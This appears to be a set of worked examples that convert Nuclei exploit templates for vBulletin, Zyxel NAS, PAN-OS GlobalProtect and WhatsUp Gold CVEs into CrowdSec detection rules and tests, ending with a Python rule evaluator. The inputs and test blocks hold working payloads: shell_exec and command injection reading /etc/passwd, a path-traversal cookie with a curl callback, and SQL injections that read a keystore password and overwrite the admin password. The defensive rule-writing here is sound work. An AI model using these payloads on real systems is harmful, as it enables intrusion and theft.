### 1 - Example Input (Nuclei Template):
```yaml
id: CVE-2020-17496

info:
  name: vBulletin 5.5.4 - 5.6.2 - Remote Command Execution
  author: pussycat0x
  severity: critical
  description: 'vBulletin versions 5.5.4 through 5.6.2 allow remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.'

http:
  - raw:
      - |
        POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
```

### Example Output (Detection Rule):
===RULE===
name: crowdsecurity/vpatch-CVE-2020-17496
description: 'vBulletin RCE (CVE-2020-17496)'
rules:
  - and:
      - zones:
          - URI
        transform:
          - lowercase
        match:
          type: endsWith
          value: /ajax/render/widget_tabbedcontainer_tab_panel
      - zones:
          - BODY_ARGS
        variables:
          - /subwidgets\[[0-9]+\]\[template\]/
        match:
          type: equals
          value: widget_php
      - zones:
          - BODY_ARGS_NAMES
        match:
          type: regex
          value: subWidgets\[[0-9]+\]\[config\]\[code\]

labels:
  type: exploit
  service: http
  confidence: 3
  spoofable: 0
  behavior: 'http:exploit'
  label: 'vBulletin - RCE'
  classification:
    - cve.CVE-2020-17496
    - attack.T1595
    - attack.T1190
    - cwe.CWE-74

===TEST_CONFIG====
appsec-rules:
  - ./appsec-rules/crowdsecurity/base-config.yaml
  - ./appsec-rules/crowdsecurity/vpatch-CVE-2020-17496.yaml
nuclei_template: CVE-2020-17496.yaml

===TEST_NUCLEI====
id: CVE-2020-17496
info:
  name: CVE-2020-17496
  author: crowdsec
  severity: info
  description: CVE-2020-17496 testing
  tags: appsec-testing
http:
  - raw:
      - |
        POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;

    cookie-reuse: true
    # the test passes only if the AppSec rule blocks the request: any status other than 403 fails the matcher
    matchers:
    - type: status
      status:
       - 403


### 2 - Example Input (Nuclei Template):
```yaml
id: CVE-2020-9054

info:
  name: Zyxel NAS Firmware 5.21 - Remote Code Execution
  description: 'Multiple Zyxel network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability.'
  classification:
    cvss-score: 9.8
    cve-id: CVE-2020-9054
    cwe-id: CWE-78
  tags: cve2020,cve,rce,zyxel,injection,kev

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
# digest: 490a00463044022043cae3ef335cbb2f8c7c8501b6c55a84c61f07feb27f26bb32429e52e8a2a2fa02203c126dbc246c5d52e30849054d666a5f58c164092064ac5a42d35936e313562b:922c64590222798bb761d5b6d8e72950
```

### Example Output (Detection Rule):
===RULE===
name: crowdsecurity/vpatch-CVE-2020-9054
description: 'Detects pre-authentication command injection in Zyxel NAS devices via weblogin.cgi'
rules:
  - and:
      - zones:
          - URI
        transform:
          - lowercase
        match:
          type: contains
          value: /cgi-bin/weblogin.cgi
      - zones:
          - ARGS
        variables:
          - username
        transform:
          - lowercase
        match:
          type: contains
          value: "'"

labels:
  type: exploit
  service: http
  confidence: 3
  spoofable: 0
  behavior: 'http:exploit'
  label: 'Zyxel NAS - RCE'
  classification:
    - cve.CVE-2020-9054
    - attack.T1190
    - cwe.CWE-78


===TEST_CONFIG====
appsec-rules:
  - ./appsec-rules/crowdsecurity/base-config.yaml
  - ./appsec-rules/crowdsecurity/vpatch-CVE-2020-9054.yaml
nuclei_template: CVE-2020-9054.yaml

===TEST_NUCLEI====
id: CVE-2020-9054
info:
  name: CVE-2020-9054
  author: crowdsec
  severity: info
  description: CVE-2020-9054 testing
  tags: appsec-testing
http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd"
    cookie-reuse: true
    matchers:
    - type: status
      status:
       - 403



### 3 - Example Input (Nuclei Template):
```yaml
id: CVE-2024-3400

info:
  name: GlobalProtect - OS Command Injection
  author: salts,parthmalhotra
  severity: critical
  description: |
    A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.

http:
  - raw:
      - |
        GET /global-protect/portal/images/{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /ssl-vpn/hipreport.esp HTTP/1.1
        Host: {{Hostname}}
        Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/{{randstr}}.txt;
        Content-Type: application/x-www-form-urlencoded

        user=global&portal=global&authcookie=e51140e4-4ee3-4ced-9373-96160d68&domain=global&computer=global&client-ip=global&client-ipv6=global&md5-sum=global&gwHipReportCheck=global
      - |
        GET /global-protect/portal/images/{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}

      # Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}{{interactsh-url}}`; payload for rce, requires cronjob to be executed to run command

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 404 && status_code_3 == 403
          - contains(body_2, 'invalid required input parameters')
        condition: and
# digest: 4a0a00473045022008b369ceac1f6e7ed59d42e2370c7ad327a6867980958a81925d5d25122b3f090221009987bd7cdcc2964e527754acdbbd8fbdc3555c53445648c5eb77102ebd08cde7:922c64590222798bb761d5b6d8e72950
```

### Example Output (Detection Rule):
===RULE===
name: crowdsecurity/vpatch-CVE-2024-3400
description: 'Detects OS command injection in GlobalProtect feature of Palo Alto Networks PAN-OS'
rules:
  - and:
      - zones:
          - URI
        transform:
          - lowercase
        match:
          type: contains
          value: /ssl-vpn/hipreport.esp
      - zones:
          - HEADERS
        variables:
          - Cookie
        transform:
          - lowercase
        match:
          type: contains
          value: sessid=/../../

labels:
  type: exploit
  service: http
  confidence: 3
  spoofable: 0
  behavior: 'http:exploit'
  label: 'GlobalProtect - RCE'
  classification:
    - cve.CVE-2024-3400
    - attack.T1190
    - cwe.CWE-20
    - cwe.CWE-77

===TEST_CONFIG====
appsec-rules:
  - ./appsec-rules/crowdsecurity/base-config.yaml
  - ./appsec-rules/crowdsecurity/vpatch-CVE-2024-3400.yaml
nuclei_template: CVE-2024-3400.yaml

===TEST_NUCLEI====
id: CVE-2024-3400
info:
  name: CVE-2024-3400
  author: crowdsec
  severity: info
  description: CVE-2024-3400 testing
  tags: appsec-testing
http:
  - raw:
      - |
        POST /ssl-vpn/hipreport.esp HTTP/1.1
        Host: {{Hostname}}
        Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/{{randstr}}.txt;
        Content-Type: application/x-www-form-urlencoded

        user=global&portal=global&authcookie=e51140e4-4ee3-4ced-9373-96160d68&domain=global&computer=global&client-ip=global&client-ipv6=global&md5-sum=global&gwHipReportCheck=global
    cookie-reuse: true
    matchers:
    - type: status
      status:
       - 403


### 4 - Example Input (Nuclei Template):
```yaml
id: CVE-2024-6670

info:
  name: WhatsUp Gold HasErrors SQL Injection - Authentication Bypass
  author: DhiyaneshDK,princechaddha
  severity: critical
  description: |
    In WhatsUp Gold versions released before 2024.0.0, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted password.

variables:
  username: "admin"
  password: "{{to_lower(rand_text_alpha(8))}}"

http:
  - raw:
      - |
        POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"KeyStorePassword": "{{password}}", "TrustStorePassword": "{{password}}"}

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(set_cookie, 'ASP.NET_SessionId=')
        condition: and
        internal: true

  - raw:
      - |
        POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"deviceId": "22222", "classId": "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE ProActiveAlert SET sAlertName='psyduck'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd');--", "range": "1", "n": "1", "start": "3", "end": "4", "businesdsHoursId": "5"}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
        condition: and
        internal: true
```

### Example Output (Detection Rule):
===RULE===
name: crowdsecurity/vpatch-CVE-2024-6670
description: 'WhatsUp Gold HasErrors SQL Injection - Authentication Bypass'
rules:
  - and:
      - zones:
          - URI
        transform:
          - lowercase
        match:
          type: contains
          value: /nmconsole/platform/performancemonitorerrors/haserrors
      - zones:
          - BODY_ARGS
        variables:
          - json.classId
        transform:
          - lowercase
          - urldecode
        match:
          type: contains
          value: "'"

labels:
  type: exploit
  service: http
  confidence: 3
  spoofable: 0
  behavior: 'http:exploit'
  label: 'WhatsUp Gold - Authentication Bypass'
  classification:
    - cve.CVE-2024-6670
    - attack.T1190
    - cwe.CWE-20
    - cwe.CWE-77

===TEST_CONFIG====
appsec-rules:
  - ./appsec-rules/crowdsecurity/base-config.yaml
  - ./appsec-rules/crowdsecurity/vpatch-CVE-2024-6670.yaml
nuclei_template: CVE-2024-6670.yaml

===TEST_NUCLEI====
id: CVE-2024-6670
info:
  name: CVE-2024-6670
  author: crowdsec
  severity: info
  description: CVE-2024-6670 testing
  tags: appsec-testing
http:
  - raw:
      - |
        POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"deviceId": "22222", "classId": "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE WebUser SET sPassword = {{encryptedPassword}} where sUserName = 'admin';--", "range": "1", "n": "1", "start": "3", "end": "4", "businesdsHoursId": "5"}
    cookie-reuse: true
    matchers:
    - type: status
      status:
       - 403

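A rule only catches what its conditions test for, so before shipping one it is worth replaying request shapes through it and checking both that the exploit shape is caught and that ordinary traffic to the same endpoint is not. The evaluator below is an added example, not CrowdSec's engine and not code from this page: it re-implements a subset of the rule grammar used above (zones URI, ARGS, BODY_ARGS, BODY_ARGS_NAMES and HEADERS; transforms lowercase and urldecode; match types contains, endsWith, equals and regex), transcribes the rules from examples 1, 2 and 4, and runs them over constructed requests with inert payloads. Two details are assumptions of this toy rather than documented engine behaviour: JSON body keys are exposed as `json.<key>` variables (mirroring rule 4), and `/regex/` variable selectors are matched case-insensitively.

```python
import json
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Rule conditions transcribed from the page's ===RULE=== blocks (examples 1, 2 and 4): each
# entry is the list under the rule's top-level `and:`.
RULES = {
    "CVE-2020-17496": [
        {"zones": ["URI"], "transform": ["lowercase"],
         "match": {"type": "endsWith", "value": "/ajax/render/widget_tabbedcontainer_tab_panel"}},
        {"zones": ["BODY_ARGS"], "variables": [r"/subwidgets\[[0-9]+\]\[template\]/"],
         "match": {"type": "equals", "value": "widget_php"}},
        {"zones": ["BODY_ARGS_NAMES"],
         "match": {"type": "regex", "value": r"subWidgets\[[0-9]+\]\[config\]\[code\]"}},
    ],
    "CVE-2020-9054": [
        {"zones": ["URI"], "transform": ["lowercase"],
         "match": {"type": "contains", "value": "/cgi-bin/weblogin.cgi"}},
        {"zones": ["ARGS"], "variables": ["username"], "transform": ["lowercase"],
         "match": {"type": "contains", "value": "'"}},
    ],
    "CVE-2024-6670": [
        {"zones": ["URI"], "transform": ["lowercase"],
         "match": {"type": "contains", "value": "/nmconsole/platform/performancemonitorerrors/haserrors"}},
        {"zones": ["BODY_ARGS"], "variables": ["json.classId"], "transform": ["lowercase", "urldecode"],
         "match": {"type": "contains", "value": "'"}},
    ],
}

TRANSFORMS = {"lowercase": str.lower, "urldecode": unquote}
MATCHERS = {
    "contains": lambda expected, value: expected in value,
    "endsWith": lambda expected, value: value.endswith(expected),
    "equals": lambda expected, value: value == expected,
    "regex": lambda expected, value: re.search(expected, value) is not None,
}

def parse_request(raw):
    """Split a raw HTTP/1.1 request into the zones the rules inspect."""
    head, _, body = raw.strip("\n").partition("\n\n")
    request_line, *header_lines = head.splitlines()
    target = request_line.split(" ")[1]
    headers = {k.strip().lower(): v.strip() for k, _, v in (h.partition(":") for h in header_lines)}
    if headers.get("content-type", "").startswith("application/json") and body.strip():
        # JSON bodies become "json.<key>" variables (top-level keys only): an assumption of this toy.
        body_args = {"json." + k: str(v) for k, v in json.loads(body).items()}
    else:
        body_args = dict(parse_qsl(body, keep_blank_values=True))
    parts = urlsplit(target)
    return {"URI": parts.path, "ARGS": dict(parse_qsl(parts.query, keep_blank_values=True)),
            "BODY_ARGS": body_args, "HEADERS": headers}

def zone_values(req, zone, variables):
    """Collect the strings a condition is matched against."""
    if zone == "URI":
        return [req["URI"]]
    if zone.endswith("_NAMES"):                        # ARGS_NAMES / BODY_ARGS_NAMES: the keys
        return list(req[zone[:-len("_NAMES")]])
    table = req[zone]
    if not variables:
        return list(table.values())
    out = []
    for var in variables:
        if var.startswith("/") and var.endswith("/"):  # /regex/ selects variable names (rule 1)
            pat = re.compile(var[1:-1], re.IGNORECASE)  # case-insensitive selection is an assumption
            out += [v for k, v in table.items() if pat.search(k)]
        else:
            key = var.lower() if zone == "HEADERS" else var
            if key in table:
                out.append(table[key])
    return out

def condition_hit(cond, req):
    for zone in cond["zones"]:
        for value in zone_values(req, zone, cond.get("variables", [])):
            for name in cond.get("transform", []):
                value = TRANSFORMS[name](value)
            if MATCHERS[cond["match"]["type"]](cond["match"]["value"], value):
                return True
    return False

def rule_hits(rule_name, raw_request):
    """True when every condition of the rule's top-level `and` matches the request."""
    req = parse_request(raw_request)
    return all(condition_hit(c, req) for c in RULES[rule_name])

# Constructed sample traffic (not from the page): requests shaped like the templates, with inert
# payloads, plus a benign request to the Zyxel endpoint to show the rule keys on structure.
VBULLETIN_HIT = ("POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\nHost: example.test\n"
                 "Content-Type: application/x-www-form-urlencoded\n\n"
                 "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo+1%3B")
ZYXEL_HIT = "GET /cgi-bin/weblogin.cgi?username=admin%27 HTTP/1.1\nHost: example.test\n"
ZYXEL_OK = "GET /cgi-bin/weblogin.cgi?username=admin HTTP/1.1\nHost: example.test\n"
WUG_HIT = ("POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1\nHost: example.test\n"
           "Content-Type: application/json\n\n"
           '{"deviceId": "22222", "classId": "DF215E10-8BD4-4401-B2DC-99BB03135F2E\'", "range": "1"}')

if __name__ == "__main__":
    for name, raw in [("CVE-2020-17496", VBULLETIN_HIT), ("CVE-2020-9054", ZYXEL_HIT),
                      ("CVE-2020-9054", ZYXEL_OK), ("CVE-2024-6670", WUG_HIT)]:
        print(f"{name}: {'blocked' if rule_hits(name, raw) else 'allowed'}  {raw.splitlines()[0]}")
```

Replaying the shapes makes the design of each rule visible: rule 1 keys on `widget_php` plus the mere presence of a `subWidgets[n][config][code]` parameter, so the content of the code parameter is irrelevant and encoding games inside it do not help an attacker; rule 2 keys on a single quote in `username`, which is cheap and robust but will also block a legitimate username containing an apostrophe, the kind of false positive a `===TEST_NUCLEI===` block (which only asserts a 403 on the exploit shape) will not surface. A check like this is a complement to those tests, not a substitute for running the real engine.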